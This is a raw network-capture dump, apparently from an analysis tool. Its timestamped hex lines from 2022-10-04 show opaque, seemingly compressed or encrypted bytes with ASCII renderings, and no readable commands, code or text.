                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23768INData Raw: 8f 5e 0c f9 fe 61 89 49 7a 86 57 7d be d9 5d 0e 5d 42 3c 26 7c cf d6 36 38 c4 ee 98 10 33 9a 6f 31 6e c2 0a 53 70 67 8e f9 53 5e e7 d6 6e c3 39 3b 40 09 3e f8 64 87 4a 74 47 19 16 7d 1d 6f 38 8c 1b cb 55 b6 6c 46 9b 9b 64 9b 63 a1 f6 ea e5 ee c7 24 20 25 06 e6 7f 5d 2b 15 a4 51 61 8d 2c c8 58 46 3c 04 7d 81 93 d2 8d 23 7f cd 01 4a 74 df e5 dd ad e9 d8 81 1c 3d 4d c3 3a 51 27 b2 61 77 27 e5 b5 db 82 23 da 2b 37 a4 32 c0 12 d7 b6 94 33 bf f4 01 44 28 43 1e 40 c1 5d 2b 14 de 16 64 f6 81 06 d4 08 f9 4a b4 ad af 7f 58 e5 d9 7e 73 75 0a a3 10 d7 33 bc 49 b7 64 3e 66 f6 c4 8b 7d 5c 27 66 c6 b9 66 45 c4 97 aa 5f 15 a6 67 91 e6 09 76 17 d7 0b 09 9b df af 7b 6a bf 39 54 e5 f2 8c ee 2c 98 c8 51 e5 99 69 72 ad ff 95 f4 22 9e 00 f1 a3 e0 bc 88 59 94 2b 93 cd d6 a3 cb
                                                                                                                                                                                                                                    Data Ascii: ^aIzW}]]B<&|683o1nSpgS^n9;@>dJtG}o8UlFdc$ %]+Qa,XF<}#Jt=M:Q'aw'#+723D(C@]+dJX~su3Id>f}\'ffE_gv{j9T,Qir"Y+
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23784INData Raw: 23 0c 2d c4 06 7e 91 c5 fd 50 7e 2a f9 6e 36 02 d2 a9 6d 5e ff b0 c1 0b dc 76 5c e6 99 2b 1e bc a8 4b 66 ef bf 81 2f 45 aa 4e b5 ae e9 e6 41 57 30 15 25 f2 aa 0a 30 c0 e1 cd fb 73 15 35 0b 26 a9 55 81 88 d0 9c e2 3b 38 c4 d3 87 f0 62 9d 95 2f 72 d1 df a6 ea 5e f0 41 1a bd d9 08 24 3d a6 1a 3b 6d 8a a7 4a 30 03 ac 92 1d c6 12 6f f1 06 21 00 f5 60 f6 9c ce cd c9 9a ed e1 40 49 c3 08 0d 06 40 f6 fd 32 e1 2f 15 cc 12 18 12 ce 06 ad ec 57 44 56 8f a5 ba 8c 97 67 97 46 7e 70 a7 fb 2f ff 21 d8 5e 88 f8 0d 82 85 40 0b 5c 95 d7 6d 42 12 11 5f ef ee 07 72 56 3d e0 4f a3 eb 19 1e 3d c4 c0 05 98 14 38 81 75 3e ac e2 6d 12 8b 04 30 2c 21 3c 00 c8 9d e7 fd 97 f0 b2 94 7c 4f 3e 00 7f 17 d5 01 83 17 0b 45 92 db 2b fb eb 95 41 ad 95 85 69 3b 41 a3 0b dd db eb b1 91 96 4a
                                                                                                                                                                                                                                    Data Ascii: #-~P~*n6m^v\+Kf/ENAW0%0s5&U;8b/r^A$=;mJ0o!`@I@2/WDVgF~p/!^@\mB_rV=O=8u>m0,!<|O>E+Ai;AJ
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23800INData Raw: 1b ba 5b 8c a1 93 17 30 0f 89 e4 c3 2c c9 75 1f 07 4e 13 60 1d 8e 7c 40 3f cd 95 2c cb ea fd 15 05 2a 94 b1 36 06 5c ff 3f 5b 63 e3 b4 d1 a8 e8 83 b2 67 92 ae 14 cf 6d 87 12 3b 66 c0 2d 99 e5 50 08 94 85 51 e7 26 16 de 61 f0 dc 00 d0 db 3b 38 be 09 e0 15 24 2e 7c 95 9d d5 09 6d 96 c0 e0 1e 5b 74 1a a1 35 83 2a ab a7 6e 7e f0 23 18 32 82 6a 9d c6 8d 23 a3 64 c9 11 46 53 22 ec c0 6b b2 cf d0 b6 9c ca 11 31 a2 68 7b 12 8c e6 8d ff 96 ad 60 bb 35 51 f6 b6 7e 5e f0 2e 63 db 11 7d 95 f7 04 03 61 2c 8a d0 5f 6f 28 8c 7e 01 dc ef 95 2d cb b6 16 fb c5 37 59 17 e3 e6 b1 17 08 6f 5d 9c 14 27 e7 80 6e 22 0b 55 e3 b7 86 a4 40 e5 b0 09 76 5a 45 4e e2 0a 1a 4d e7 d1 00 a5 6b 1d 7f 20 8d 89 f0 9a dc f1 29 a5 33 cf 4c bd ed c0 93 d7 35 94 63 4e a5 97 23 51 e5 6f 46 0a 2d
                                                                                                                                                                                                                                    Data Ascii: [0,uN`|@?,*6\?[cgm;f-PQ&a;8$.|m[t5*n~#2j#dFS"k1h{`5Q~^.c}a,_o(~-7Yo]'n"U@vZENMk )3L5cN#QoF-
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23816INData Raw: 14 d3 52 34 7e c1 d6 0e d7 f1 2e 84 e8 86 0a 57 53 e0 9a a0 2d d4 ca fe 76 7c 5a 87 75 35 28 75 3a 3a 3a a0 8f 02 10 9c 0f 0d 50 16 ab ed 68 dd 51 ba 15 2e 11 0c e3 c3 24 3d 26 e9 39 af 19 33 8e cf fc 20 2d 6c 8d 58 06 4a 3e d0 02 98 6d ba b7 8f a9 ff 8a 48 2b 60 17 66 a6 0e 03 4a 60 b4 fc db 31 89 e8 f7 61 68 84 94 87 48 04 40 73 3d 7e 92 52 e6 0e 0e e8 75 90 97 d0 94 73 0e 0b 3d 67 84 7a 3b 94 25 9d 1c 4f 2e 9d 4d 43 ec 85 a8 01 e7 a1 61 87 43 b3 62 c2 15 71 67 e7 9f a3 b9 b5 26 c7 ca 75 cf 3c 37 25 e2 7c a4 d1 59 40 35 b1 55 3d 26 ca d3 b8 c1 4f 77 38 ef 31 5a e7 44 81 77 ff 94 6b 47 04 36 83 a2 f7 c1 3a 3c d5 4b f9 f7 4e f5 1b 01 3b 92 ce ef a7 e1 f3 06 a7 c4 4a 02 87 38 aa 8e d4 61 19 68 61 d3 88 3b 24 cf 4f 8e a5 bc ab 83 7c aa 2a 17 b0 23 69 58 a4
                                                                                                                                                                                                                                    Data Ascii: R4~.WS-v|Zu5(u:::PhQ.$=&93 -lXJ>mH+`fJ`1ahH@s=~Rus=gz;%O.MCaCbqg&u<7%|Y@5U=&Ow81ZDwkG6:<KN;J8aha;$O|*#iX
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23832INData Raw: d5 b1 ea f2 1f ba da 1f 39 10 22 c8 b8 51 97 e3 c0 af 62 e9 df c9 1f 02 94 60 18 ee a1 f3 76 1a 4c 02 e3 dd e2 31 38 63 49 6c 4e 94 ba 5c 53 19 f4 d9 b5 b2 5b 0f d7 52 18 cb d6 97 04 99 eb 00 48 ee 6d b2 35 fd 85 5a 86 40 5e 21 6a a6 97 c2 48 cb 0d d5 cc bc 25 5e 77 7a 45 3c 0a a5 3a 25 d1 ec 9c 52 bc 2d dc 14 45 fd 50 6b f8 14 eb 2f 13 83 00 5e 5b f6 fd bf 96 09 7e f5 ce b2 c4 ed 45 eb 8e f2 08 2f 2b 42 60 a1 75 8b 8c fb fc 80 60 9e 06 9e 88 17 a5 96 39 b2 52 b4 86 0e 1f 88 c3 1a e1 84 b1 eb cb 78 f5 86 c0 65 62 e9 4d a8 a3 2c a7 ee 8f 2f 54 0b 1a 38 30 9a c3 e0 ce 53 0f 6b 51 90 c6 9c 56 14 f7 bc 0b da 34 21 e9 87 ca 22 c7 65 9e de 76 60 c2 d5 81 e2 49 22 4a c5 0e cc 41 eb 09 c7 95 99 b8 db cb f4 f2 08 7e 19 ed cb 68 59 6d 5c c7 6f bb 47 69 ab 52 ab ea
                                                                                                                                                                                                                                    Data Ascii: 9"Qb`vL18cIlN\S[RHm5Z@^!jH%^wzE<:%R-EPk/^[~E/+B`u`9RxebM,/T80SkQV4!"ev`I"JA~hYm\oGiR
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23848INData Raw: cf 89 47 e4 57 f3 57 5d 95 fb f2 12 ad 76 02 d8 08 d5 ca 86 5e 8f 72 5c 4a d9 a4 9c 8f 74 5b 77 36 00 64 74 d0 79 b5 60 00 96 c2 9f e7 09 5f 16 d1 cc 9d 5d 46 87 4f 2e 7f 70 4b d4 e9 b1 a8 b2 06 f9 47 4b 9c 03 f1 39 7c 95 76 4f 7a 2b e6 6c ef c7 09 d6 bc 0b 18 34 c1 f2 de 97 be de 44 e7 01 95 40 65 81 fa 0b 23 d9 d0 b3 53 7e 9d a5 9c 58 f2 74 fb 00 4f f1 e8 5c 09 f7 97 d1 2c 2d 05 b7 65 89 b2 e0 8f a2 e5 d0 46 b3 8a c7 1a 59 f0 ce 01 1d 49 e1 56 fd f7 fa ab 1b 2e da 32 85 82 61 e1 33 56 dc b7 32 00 36 52 25 b8 04 9b 60 7c 3c a6 0c 5a 54 70 8e af a9 e8 70 53 39 95 ea 30 37 77 54 99 df a4 55 95 0e 6a 8a ff c5 20 76 ba f9 fa 59 db 2e df 1e 9a d9 b8 86 71 df 53 86 41 2b 81 83 d0 a8 ca 9e c4 03 3d 73 ce fc 86 27 ca 4f 54 3b d1 73 53 1d d0 bd 7c e0 6a f2 b1 0f
                                                                                                                                                                                                                                    Data Ascii: GWW]v^r\Jt[w6dty`_]FO.pKGK9|vOz+l4D@e#S~XtO\,-eFYIV.2a3V26R%`|<ZTppS907wTUj vY.qSA+=s'OT;sS|j
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23864INData Raw: 5c 64 ad 5c 46 44 bc dc 9b bf a4 5d f9 af c8 7d 4f 78 41 02 18 69 a7 df dc 7a dd ef 50 97 3a 55 5d d7 65 25 ef 06 8e bd 75 02 1b 64 60 46 9c 9d 96 78 de 12 6d 99 8f c2 f5 44 77 80 f0 33 cd 36 01 c6 4e 1c a0 4d 30 27 8e 5e a2 b9 c7 96 0c 16 f1 6f 57 81 cc 46 56 fe 74 33 7b b9 d5 54 22 34 00 96 a2 61 5e 40 c9 0c 65 d3 09 0d 12 1a e8 8e 4d 36 47 39 79 2c 96 0a 27 25 c9 be 36 13 f2 c2 8a 57 55 08 94 af 01 74 ab 61 25 cb cd 5f 48 68 b8 28 67 67 22 89 24 7c 9e 90 9f 91 b9 2a 4a 68 a6 8d 6f 85 52 7b ef 8f 22 45 39 e5 40 5d 8a 93 b2 ec 0c 8f 08 4d 9a 76 1a 5b 5c 8a 87 50 54 bc dc f9 2e 91 bf bd 9b 30 2d 2b 1a 12 1a ec 9b 09 82 5d 10 64 ad a4 96 8d ba a1 3d ec d0 b2 50 61 8d 3e 5a 0f 46 3c 2d ea 34 1f 0a 36 98 74 d3 2a 85 0b 1e c2 c3 28 df 94 8e 6a c6 1d 27 9b c1
                                                                                                                                                                                                                                    Data Ascii: \d\FD]}OxAizP:U]e%ud`FxmDw36NM0'^oWFVt3{T"4a^@eM6G9y,'%6WUta%_Hh(gg"$|*JhoR{"E9@]Mv[\PT.0-+]d=Pa>ZF<-46t*(j'
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23880INData Raw: 72 e7 0a c9 48 6a 05 81 96 95 b7 c9 bb 78 6d 1a a6 12 22 db f2 f3 9d d1 cf b6 bc cb 3f 31 d7 24 67 ec 6b 86 c0 ff 96 2a 10 26 6a 90 ed b9 9e 23 0d 55 c7 36 17 4d f7 4f 58 bf 55 4b 5c 09 82 18 9d 80 7f d7 81 55 c3 3f b0 da 42 b1 03 60 4f e6 f3 2e 7c 24 91 18 b7 38 55 3f 10 7f cd be d8 1b e0 36 d8 9b f1 51 96 8a 20 a0 dd 39 62 54 47 ea 81 61 9d 85 8e 9f ee 17 a1 49 61 a1 1c 72 36 9e 29 30 bd 1f 1c af a0 ff c2 18 7c 58 6d df c2 cd 05 cf 72 85 60 12 4b e7 48 ce e5 53 ff 70 28 90 30 5c 84 a3 09 cc 88 05 98 92 ed 92 26 82 f9 5e f3 5a d0 9c f7 e0 1e 9d 9e d5 39 c4 ad 59 03 5b f9 b8 46 62 a8 da 22 1b 21 69 a4 fb 8a 04 d0 f3 b6 8c c3 6b 27 89 f0 35 ea d4 c8 e9 09 01 09 31 32 e9 7e 65 81 11 2b 84 52 6f f4 9d dc 15 2c 9c 4a 67 8b 59 1a 7c fb b3 df 72 dd 3c 98 c9 48
                                                                                                                                                                                                                                    Data Ascii: rHjxm"?1$gk*&j#U6MOXUK\U?B`O.|$8U?6Q 9bTGaIar6)0|Xmr`KHSp(0\&^Z9Y[Fb"!ik'512~e+Ro,JgY|r<H
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23896INData Raw: de bd c9 c8 79 2f e3 00 e9 ee fa 78 78 d6 af 6d 90 05 ca 62 a1 6b d3 83 8b 73 a9 2b e3 ba 70 e0 d1 c4 d8 2d 50 37 75 e5 b9 0a 30 2b 58 07 de 2f c8 26 34 d9 b9 2e 62 5e 02 6d 26 82 6f b6 3a f4 e6 c4 1b 88 1a 0c 24 74 39 7d 5a 1d 12 09 cf 4a 95 3b 50 6d dd 1f f8 1e e7 20 b5 ce 65 32 57 b1 dc 57 f5 5d fa c9 9b be a8 6d 88 5e 2c 5c 56 9e a9 0d c3 c5 c3 fa ab 18 b5 9a 6c 23 6e 1a 60 6c 8f 7b 0d fb f6 a3 c3 26 a0 72 77 15 50 69 47 ba 66 86 66 a6 73 55 1d e8 2f 31 91 b3 c5 9a b4 ae 79 0b cd 43 30 ab 69 eb 5c a4 68 78 71 2f 57 3b 06 1a 83 fa 94 a0 49 27 c8 d5 88 47 ad 46 e1 95 65 78 eb bf 2d da 15 f5 4c ff c9 56 34 bb 45 4f db 27 cc 49 29 22 29 4e d6 90 cb a2 88 b5 5c 0b b4 d5 41 d6 2b 47 ca cc 5e 31 df 84 a0 d9 11 1f 49 72 22 0a cf 3f 37 5a 81 6c aa e7 ca 01 92
                                                                                                                                                                                                                                    Data Ascii: y/xxmbks+p-P7u0+X/&4.b^m&o:$t9}ZJ;Pm e2WW]m^,\Vl#n`l{&rwPiGffsU/1yC0i\hxq/W;I'GFex-LV4EO'I)")N\A+G^1Ir"?7Zl
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23912INData Raw: d2 ed 9f 0d 5c 96 e2 bf d9 d8 34 d5 9b 59 95 c3 d0 ba 4d 66 7c c1 7b 72 2d fc ea 78 a0 60 9a 06 dc bb 58 ac 62 bb ca 3e 9c e5 13 ab a8 33 53 72 88 2d 16 29 8b 64 51 b3 17 34 c1 ad c9 78 c4 d9 e5 03 75 51 7c 53 68 cd ce 27 08 35 9c 43 f0 99 27 0e b9 27 f4 8f 23 f7 1a 4e 43 cc e2 fb 38 d6 0f a1 81 24 ed 6c ed 13 06 4f ac 71 e8 bf 0b 4b 5d 79 f0 c4 08 ad 01 b1 71 14 b3 8c 61 c5 d8 cb 8a 94 e0 8b 01 65 0d df 82 9f 96 33 03 52 82 a6 6f 7d 7f ef cb f7 86 b2 76 73 b7 55 ec 4e 30 10 11 92 ec e4 7a 13 d2 a7 aa a2 d7 1f b6 b7 7e 27 ba d6 f1 fb 9f f2 1f e7 b2 11 44 3e 84 0c 4a 79 04 ad 26 c8 1a 0c b5 63 2d b0 ac 96 3b f8 84 ea 42 25 8e e7 12 34 39 8c 8c 65 73 a3 9e c5 be 8e d9 24 9c 8b 8c cf 62 2e f6 54 30 c9 e4 4a 04 0a ea 24 60 ef ea e3 59 e0 ec 06 63 70 f3 7c d7
                                                                                                                                                                                                                                    Data Ascii: \4YMf|{r-x`Xb>3Sr-)dQ4xuQ|Sh'5C''#NC8$lOqK]yqae3Ro}vsUN0z~'D>Jy&c-;B%49es$b.T0J$`Ycp|
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23928INData Raw: f8 2a ee 24 c3 05 2e 60 15 05 0c 8b e3 76 67 b5 35 23 9f ab ce 58 a1 5b 0a b8 01 57 4d 6e 15 21 86 48 a8 58 27 39 05 28 cb 4a 6b 51 79 24 56 ad c2 5a 4c 76 0c 68 76 56 54 09 ef d7 79 84 14 4d cb 49 53 9b 83 a3 fd 29 ed e1 9e a2 16 df bc 56 09 88 70 1d 48 81 01 75 33 59 d4 a2 04 75 ff 6e 2d de 24 5a 53 a8 c7 40 de be b0 66 23 f5 a7 cc c5 c7 6b cd 07 ac 75 63 bd 53 b4 5e b0 a7 7b 5e a9 55 34 da b3 83 aa 81 1e 38 4b 47 c3 ef ba e5 55 87 a2 12 b9 96 3d 03 fa 3f 1b fb 52 2c 97 7f ea cc ab de 7f 44 9a dc ca 11 ea 6e 64 64 5d f2 c7 7d 14 43 6c 23 48 04 b6 8a 15 2e 78 b4 7f 2a 30 d0 35 2c 73 1a 74 76 d3 72 23 db 5e 61 8a 1e 22 b6 c5 02 45 ef dd 04 ae 95 33 97 7c 99 c7 03 a2 57 f5 32 50 01 fb da 28 ad 8e 0e 36 83 a2 e0 d3 5e 86 5b f2 67 5e a2 42 b5 e2 57 f8 c5 84
                                                                                                                                                                                                                                    Data Ascii: *$.`vg5#X[WMn!HX'9(JkQy$VZLvhvVTyMIS)VpHu3Yun-$ZS@f#kucS^{^U48KGU=?R,Dndd]}Cl#H.x*05,stvr#^a"E3|W2P(6^[g^BW
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23944INData Raw: d7 d7 23 85 a4 ec 02 fd 94 5f 6d f3 bf c1 1c 58 1e 1d 98 be 05 e7 5e 72 ff 0a 5a fd ff ac 7d 0c eb e2 6c e4 81 42 bf 6e 27 ea 6d e2 d1 2a 70 cd 05 52 e9 d5 10 65 b9 41 0b 3e 93 e1 04 d1 ba ee 02 ab b4 d9 37 5e 7e 78 6e 66 c1 ff 64 da fc 46 7f a7 50 2a 23 b2 f5 f8 74 53 3e 95 04 35 6b 49 3e e5 50 cf 30 4d 5e d9 39 4d 1b a3 a1 2c 71 98 77 01 2d 82 62 c7 fc 46 b0 61 b6 e9 d0 e1 b9 8c b7 21 84 32 59 59 cd 97 74 3c 16 a2 06 ae 8f 6f 83 ba 4d 2e 9d ac df 53 a9 aa 75 56 80 fb ea f9 05 5f 22 8a 77 44 93 97 94 fc 59 4c 60 53 cd 16 71 c0 d1 31 5d f6 1d 86 ac 81 83 87 a6 29 36 28 a9 d7 0c ae df ea 94 ab 7e 1a 5e ac bc 92 8c 1f f0 26 82 ec 06 2e e1 16 56 88 46 16 3f 11 67 b0 e4 b5 f7 30 e8 f6 c9 d3 81 e9 92 43 da 6c 35 0e 60 84 5c d4 37 5f 64 17 1e bc 75 d3 68 31 c2
                                                                                                                                                                                                                                    Data Ascii: #_mX^rZ}lBn'm*pReA>7^~xnfdFP*#tS>5kI>P0M^9M,qw-bFa!2YYt<oM.SuV_"wDYL`Sq1])6(~^&.VF?g0Cl5`\7_duh1
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23960INData Raw: bb 54 79 03 a8 17 18 a3 9f bf 8a 11 d6 17 45 d1 26 c9 2c dc 24 59 67 cc 43 1d 45 cb 3b 5c 40 77 24 2d 54 f7 5f b2 21 5c d7 fa 32 18 c8 45 94 9d ba 78 15 5c 8f 97 8c ea 5a 68 5d 92 88 c9 e8 eb b0 d6 f8 cd 29 74 28 33 55 92 94 01 5f ca b7 8f 69 d6 1a bc 32 e8 af dc bc 32 b2 27 64 6b b4 61 6f cd 96 ab 03 c1 08 32 71 cf 14 35 70 1c e0 43 ed 1c ea 1e 61 2c 68 49 41 5e d3 56 bb 54 58 4a 0a ed fe 8d 03 8d 2a c8 f2 66 f8 38 da 4b d9 eb ba 2f 62 e5 75 c1 f5 1b a1 96 15 e5 95 32 ce 0a dc bf 6e 59 5a 6b 4b df c4 2c 7f 6f 41 1e 19 f2 cb e9 bb 39 bd 55 34 83 28 55 c1 bd bc 6f 6f f5 9e 51 22 6d 25 7b 50 b0 3a ca d8 9b 77 7c b1 4f 65 3c b8 52 a1 d7 82 7e 57 c5 99 03 3b 20 61 d7 3a 22 fd f8 a7 9a 1f 3e de 99 b4 83 d0 d7 b9 9a b7 e7 94 88 3e 58 d0 ac c9 72 1d b9 85 26 4f
                                                                                                                                                                                                                                    Data Ascii: TyE&,$YgCE;\@w$-T_!\2Ex\Zh])t(3U_i22'dkao2q5pCa,hIA^VTXJ*f8K/bu2nYZkK,oA9U4(UooQ"m%{P:w|Oe<R~W; a:">>Xr&O
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23976INData Raw: 28 fb 9d a3 1c 1d bc a9 6b c9 58 69 7f 90 66 7b d6 fd 10 49 42 16 59 03 4a e8 8c ff 37 d7 8b e7 43 72 64 2c fa 55 9f 8b eb bb 8c 34 a2 6e 0f 4f 81 4c 06 7a 05 46 d6 6a 98 46 ae 81 07 1f 02 84 f2 ce 90 58 9d 69 ae 28 a8 79 c9 b1 fa 13 75 49 c3 6a 55 bb 79 42 17 ba 10 de c3 e8 2b 9b df c1 a5 79 b8 b0 74 74 61 8b 64 8b e0 29 f3 59 2a b7 c5 2e 0a cc bd 48 eb e9 53 60 42 42 c9 15 f3 c4 ac 99 42 9a 4f c3 5e ec b1 25 a6 d2 41 22 57 27 f7 11 92 9a b8 e8 61 9e 9c 92 d5 67 6f 3c 37 a0 1f f3 20 85 74 77 a8 0b 20 96 c9 d9 4f 16 f9 c2 f6 1f 2a 91 1c 59 6b 07 ca 9b 70 6b 31 bb 83 b7 db 8d 1e c6 14 f5 d9 ed 19 c6 b9 6e a8 65 05 b2 8b 06 3f 0b 00 03 e6 a3 5b 4d 2a 9a c1 dc 9a 47 77 cc cc 9a d2 eb 3d c6 0b 30 76 42 5d 3f 93 f0 14 fc a2 d6 03 65 ae 95 20 ea 4f c7 45 08 22
                                                                                                                                                                                                                                    Data Ascii: (kXif{IBYJ7Crd,U4nOLzFjFXi(yuIjUyB+yttad)Y*.HS`BBBO^%A"W'ago<7 tw O*Ykpk1ne?[M*Gw=0vB]?e OE"
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23992INData Raw: 02 87 5c 3f 38 a2 a4 1a 46 01 d8 97 12 b8 35 58 c7 db 06 7b d4 70 1a 88 7f d2 c7 7c 8f 2a d8 af 1a cf 8d 8b de 4c 3c d0 b8 17 2e f4 b2 ef d1 af 0d ea e8 aa 3e a9 04 9e d4 7a f9 c2 d0 e6 ec 92 8d 42 02 c6 79 90 87 16 64 a4 3f aa 5e b7 ac 1c 48 20 18 03 63 3a 94 b6 53 ae 6a 69 ed 10 e6 02 30 2b a3 e0 c4 2b 8b 5c e2 df b8 0b 36 9a 0b 7d 6c 92 40 37 31 cf 73 a6 e8 ca 9c 0d 0c 4e 14 a0 de 1b 5e 5c a3 f3 e7 fd 6a 12 de 07 6a ab 15 50 30 4b ac b8 0c 29 62 e8 46 46 01 c4 14 a1 17 07 00 ec db 4c 47 90 6d 9d 67 2c 38 73 0d 17 42 ea e6 a6 82 30 3b 8b 9f 20 e8 ca 7e 0d 00 49 c8 94 ae 12 76 9c e9 47 3c 88 02 08 2d b1 fe 36 d3 19 77 2d db f9 f4 1b a2 06 64 63 16 12 ff 75 ed c1 3f d7 14 3c bb ff 3d c7 54 c1 da ff 22 e4 5f 47 b2 bc 96 f5 e1 c6 03 51 d7 3d e1 a1 b6 89 85
                                                                                                                                                                                                                                    Data Ascii: \?8F5X{p|*L<.>zByd?^H c:Sji0++\6}l@71sN^\jjP0K)bFFLGmg,8sB0; ~IvG<-6w-dcu?<=T"_GQ=
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24008INData Raw: ac 57 63 97 50 af e3 d2 8c 2f 93 3d f8 f4 a3 75 49 ba 0a 4a 88 94 5a c9 5f 4e 0a b9 cf b3 a6 33 1b 5d 73 7e b3 77 d2 2c c9 01 15 b7 95 75 53 3d 13 c1 5a 27 f0 77 7f d5 0c 61 5d bf 09 ad 4d 2d a6 e5 9b 06 05 0a c9 fb b8 05 aa be 36 3d 35 11 0c 3b 7a 52 4b 9c a2 14 e1 a1 7e df 93 71 d5 7d 27 01 54 58 b2 8e f6 e5 9d 4f 9f b4 62 10 29 18 c9 84 d0 c1 e7 c2 49 46 9e ec 46 a3 6a ff 3d 4a 14 43 3b b5 0a e2 1f 30 23 6b 08 5b d2 87 ec 62 2f 11 64 01 b8 7b 34 9f 4b f5 05 50 6e 07 12 88 23 15 22 f1 9a e8 43 86 f5 58 63 bf 7a 50 9a 2b 5c 8d 39 05 02 e7 ee 0d 6b 37 4d 71 88 c9 d5 71 3c 5b 00 07 4f be 9d 43 6a 77 01 ee 38 6e 55 c4 23 29 71 b3 78 d8 b8 d2 b4 8d 63 44 0d 63 95 b5 ec c9 52 d8 ab 04 db 30 63 81 3b 78 9f bb 5c 54 f9 c6 03 4a ed ff 01 00 11 c8 59 65 e8 80 25
                                                                                                                                                                                                                                    Data Ascii: WcP/=uIJZ_N3]s~w,uS=Z'wa]M-6=5;zRK~q}'TXOb)IFFj=JC;0#k[b/d{4KPn#"CXczP+\9k7Mqq<[OCjw8nU#)qxcDcR0c;x\TJYe%
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24024INData Raw: a9 c6 05 92 37 9d 43 2c 3c f4 a5 ff 44 20 9e bf 9c ca d6 28 87 37 be 0d d9 0f 40 c0 1a 88 7f c1 50 de 7b 17 f5 a3 07 a1 c5 38 d9 e9 81 31 a6 47 19 11 cf 21 3c c8 19 21 c2 ae b8 e5 d6 96 e1 93 fb db b1 8f 9f 6c 61 14 25 63 37 46 24 87 55 ae 8d a8 43 11 48 a7 44 e0 80 e1 90 f2 94 fc d0 ef 76 c4 c4 cc b9 5c 33 2e 69 6c 56 3d 79 77 11 f4 d4 df b4 6c 67 f6 d1 d1 8d bd f5 c5 48 99 af 0b 47 c3 f4 47 7f 69 5d 3a 8a f5 ce 41 13 9b f2 86 01 da e9 6f b6 ec 9a d4 21 5a c2 da 8e f0 19 59 a0 61 fd 1b b6 8b cd 06 2b 15 e1 9b 78 43 46 58 35 e4 aa 70 dd 80 b3 1c be 64 ae 87 d5 c8 9a 64 89 91 c8 db e1 b7 50 69 32 a1 de 37 0a 3c f5 fd cb da db c5 2c c3 28 ef f6 d3 da 72 7f 67 c5 21 1b ca 51 a8 55 95 a8 74 e8 fa fa 26 76 8a b8 2f 64 44 99 8b a7 5b f6 cd 27 d7 81 67 6c 82 39
                                                                                                                                                                                                                                    Data Ascii: 7C,<D (7@P{81G!<!la%c7F$UCHDv\3.ilV=ywlgHGGi]:Ao!ZYa+xCFX5pddPi27<,(rg!QUt&v/dD['gl9
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24040INData Raw: 8a 88 e3 3d b2 b6 61 2b 6f df 8d 54 a0 00 7f b6 39 c6 f4 72 fe 85 f6 b6 7c bf f9 04 e9 a0 41 d5 68 70 3f e4 6a b8 09 d9 fe 77 94 5d 83 fc 03 c2 01 1e 23 fd 53 5a a3 f6 5c 78 74 c3 e2 3c 70 49 43 bf 6c 5b 50 88 40 f7 17 7f f0 6a a0 3f c5 0e 78 df 70 93 e1 1c 8f c6 ab f5 39 0f 50 f2 60 90 97 47 d1 bd 0e a0 bb 8d df 25 f7 0e d3 cc cd ee db 6c 9f 2a 22 97 89 2f af c8 db e9 09 ee 08 52 dc 2c c6 db 6d f7 92 73 12 c3 81 9b 05 50 f2 d0 36 2f 90 03 4e e5 c5 bb 02 42 ba 58 84 99 d3 ae a8 8d 4e f8 23 9c c5 8a 81 7e 99 15 7a b9 ac 08 6c 0e 58 6f f2 e4 f1 5a 17 32 b6 82 c2 30 0a cd ce f3 5b 83 96 bc 23 3d f3 ef 6f 88 99 67 5d 16 fc d9 3c 6f 20 fb 31 e0 a3 7e 9d c8 89 48 99 55 bc 55 92 64 76 65 ba 5b 5a 66 f9 19 63 c7 31 f3 76 05 5f ab 72 25 d1 35 be 23 66 2b 4d aa 56
                                                                                                                                                                                                                                    Data Ascii: =a+oT9r|Ahp?jw]#SZ\xt<pICl[P@j?xp9P`G%l*"/R,msP6/NBXN#~zlXoZ20[#=og]<o 1~HUUdve[Zfc1v_r%5#f+MV
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24056INData Raw: 66 05 5f a2 e1 49 b0 cb d4 7d 89 e1 55 c9 f9 9e 3e e7 ea 80 9f 40 71 15 60 2e 9e 64 47 03 c0 b0 2a 55 53 e5 6d b9 5a ae f0 2b 07 14 24 a4 9c c9 86 ae c2 0f 8c 0a 5f 4a 47 2f b1 e5 5c 13 38 f0 b8 01 36 42 0d 71 7d 2b e3 6d 52 c9 84 04 9b d7 0e 96 59 fd 35 ba 67 de 99 52 a4 88 3e 49 8f 4c fe 51 55 c2 4f bb 17 a6 d3 d0 94 b0 2d 3d 73 04 63 99 39 19 62 5b 87 da 3a ac 4b ca 12 91 53 00 97 1a 9a c8 fe f4 fc 5d 66 86 4e 87 39 53 b1 04 35 8f 6a 98 b0 32 8d c3 ad fe 70 6b 3c 8a 14 f9 7a 13 9e fb 07 80 1a 49 55 c1 f5 51 e7 95 a7 36 52 b4 81 89 e5 cb b8 45 1d b8 14 6a f2 53 e9 59 f3 24 ed 32 25 b0 9e 57 37 0a 51 9d 4b e1 69 e8 81 e4 03 49 ca 45 77 d3 bf ab 93 c2 4a d8 e3 4c 88 44 82 d4 c7 15 b4 a1 c0 d7 33 86 7c 59 3b ba 2f 01 a9 a1 ab 73 13 45 99 b8 37 18 cc 32 a3
                                                                                                                                                                                                                                    Data Ascii: f_I}U>@q`.dG*USmZ+$_JG/\86Bq}+mRY5gR>ILQUO-=sc9b[:KS]fN9S5j2pk<zIUQ6REjSY$2%W7QKiIEwJLD3|Y;/sE72
